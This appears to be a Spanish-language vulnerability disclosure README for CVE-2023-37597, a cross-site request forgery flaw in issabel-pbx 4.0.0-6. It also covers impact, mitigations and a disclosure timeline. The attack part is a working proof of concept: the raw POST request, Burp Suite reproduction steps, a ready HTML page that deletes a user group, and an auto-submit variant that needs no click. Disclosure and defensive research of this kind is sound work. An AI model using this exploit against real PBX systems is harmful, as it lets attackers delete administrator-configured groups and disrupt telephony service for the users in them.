
Issabel-pbx v 4.0.0-6 contiene una vulnerabilidad de Cross-Site Request Forgery (CSRF) en su funcionalidad de gestión de grupos de usuarios.
Aviso: Este repositorio está destinado únicamente a fines educativos y de investigación de seguridad autorizada. No use este exploit contra ningún sistema que no posea o para el cual no tenga permiso explícito por escrito para realizar pruebas.
issabel-pbx es una plataforma de comunicaciones unificadas (PBX) de código abierto ampliamente utilizada que proporciona servicios VoIP, gestión de telefonía y administración basada en web. La versión 4.0.0-6 de issabel-pbx contiene una vulnerabilidad de Falsificación de Petición en Sitios Cruzados (CSRF) en su funcionalidad de gestión de grupos de usuarios.
Un atacante remoto no autenticado puede crear una página HTML maliciosa que, cuando es visitada por un administrador autenticado, emite silenciosamente una solicitud HTTP POST falsificada para eliminar cualquier grupo de usuarios. Debido a que la aplicación no valida el origen de las solicitudes de cambio de estado con tokens CSRF ni con políticas de cookies SameSite, el navegador incluye automáticamente la cookie de sesión del administrador, lo que provoca que la eliminación se realice sin el conocimiento ni consentimiento de la víctima.
La Falsificación de Petición en Sitios Cruzados (CSRF) es un ataque que engaña al navegador de una víctima para que envíe una solicitud autenticada a una aplicación objetivo en nombre del atacante. El ataque tiene éxito cuando:
Origin/Referer, no hay atributo de cookie SameSite=Strict ni SameSite=Lax).El endpoint de eliminación de grupos de usuarios (/index.php?menu=grouplist) en issabel-pbx 4.0.0-6 procesa solicitudes HTTP POST que contienen únicamente la acción delete y un parámetro id_user. La aplicación no:
Origin o Referer.SameSite en las cookies de sesión.Como resultado, cualquier página web cargada en el navegador de la víctima puede enviar silenciosamente el formulario de eliminación utilizando la sesión existente de la víctima, ya que el navegador adjuntará automáticamente la cookie de sesión.
POST /index.php?menu=grouplist HTTP/1.1
Host: <IP de Issabel>
delete=Delete&id_user=<ID_DEL_GRUPO_DE_USUARIOS>
Advertencia: La siguiente PoC se proporciona estrictamente con fines educativos. Úsela solo en entornos de laboratorio o sistemas para los cuales tenga autorización explícita.
Paso 1 — Iniciar sesión en el panel de administración de Issabel
Navegue a la página de lista de grupos de usuarios e inicie sesión con credenciales de administrador.
https://{IP de Issabel}/index.php?menu=grouplist&action=view&id=11

Paso 2 — Capturar la solicitud de eliminación
Intente eliminar un grupo de usuarios mientras el tráfico se redirige a través de Burp Suite. Haga clic derecho en la solicitud POST capturada y seleccione Engagement Tools → Generate CSRF PoC para generar el esqueleto HTML del exploit.

Paso 3 — Alojar la página del exploit CSRF
Guarde el HTML generado como un archivo (consulte Código del Exploit PoC a continuación). Alójelo en un servidor controlado por el atacante, o envíelo directamente a la víctima.
Paso 4 — La víctima abre la página del exploit
Cuando el administrador autenticado abre o es redirigido a la URL del exploit, el formulario oculto se envía automáticamente (o la víctima hace clic en el botón de señuelo). El grupo de usuarios objetivo se elimina del panel de administración.


El siguiente archivo HTML (también disponible como CSRF exploit.html) demuestra el ataque. Reemplace {IP de Issabel} con el host objetivo y ajuste id_user para que coincida con el ID del grupo que desea eliminar.
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://{IP de Issabel}/index.php?menu=grouplist" method="POST">
<input type="hidden" name="delete" value="Delete" />
<input type="hidden" name="id_user" value="7" />
<input type="submit" value="Enviar solicitud" />
</form>
</body>
</html>
Variante de envío automático: Para eliminar la necesidad de que la víctima haga clic en algo, agregue lo siguiente dentro de la etiqueta
<body>para que el formulario se envíe automáticamente al cargar la página:<script>document.forms[0].submit();</script>
| Dimensión | Descripción |
|---|---|
| Integridad | Un atacante puede eliminar silenciosamente cualquier grupo de usuarios del panel de administración de Issabel. |
| Disponibilidad | La eliminación de grupos de usuarios interrumpe las reglas de enrutamiento de llamadas, el control de acceso y los servicios de telefonía para todos los usuarios pertenecientes a esos grupos, lo que equivale a una Denegación de Servicio parcial. |
Los administradores y desarrolladores deben aplicar las siguientes defensas:
Implementar tokens CSRF (Patrón de Token Sincronizador)
Establecer el Atributo de Cookie SameSite
SameSite=Lax (mínimo) o SameSite=Strict para evitar que las solicitudes de origen cruzado lleven credenciales de sesión.Set-Cookie: PHPSESSID=...; SameSite=Lax; Secure; HttpOnlyValidar las Cabeceras Origin y Referer
Origin o Referer no coincida con el dominio propio de la aplicación.Requerir Reautenticación para Acciones Destructivas
Aplicar Defensa en Profundidad
| Fecha | Evento |
|---|---|
| 10 de julio de 2023 | Vulnerabilidad descubierta y documentada por Sahil Ojha |
| 10 de julio de 2023 | CVE-2023-37597 asignado |
| 10 de julio de 2023 | Divulgación pública |
Sahil Ojha Investigador de Seguridad
Si encontró útil esta investigación, no dude en dar ⭐ estrella al repositorio.
| Campo | Valor |
|---|
| ID CVE | CVE-2023-37597 |
| Vulnerabilidad | Falsificación de Petición en Sitios Cruzados (CSRF) |
| CWE | CWE-352 — Falsificación de Petición en Sitios Cruzados (CSRF) |
| Gravedad | Media |
| Vector CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H |
| Versión Afectada | issabel-pbx 4.0.0-6 |
| Divulgado | 10 de julio de 2023 |
| Investigador | Sahil Ojha |
| Campo | Valor |
|---|
| Nombre del Producto | issabel-pbx |
| Versión | 4.0.0-6 |
| Vendedor | Issabel Foundation |
| Página web del Vendedor | https://www.issabel.org/ |
| Código Fuente | https://github.com/IssabelFoundation/issabelPBX |
| Probado En | Windows (Burp Suite Community Edition) |
| Confidencialidad | No se ve afectada directamente por esta vulnerabilidad. |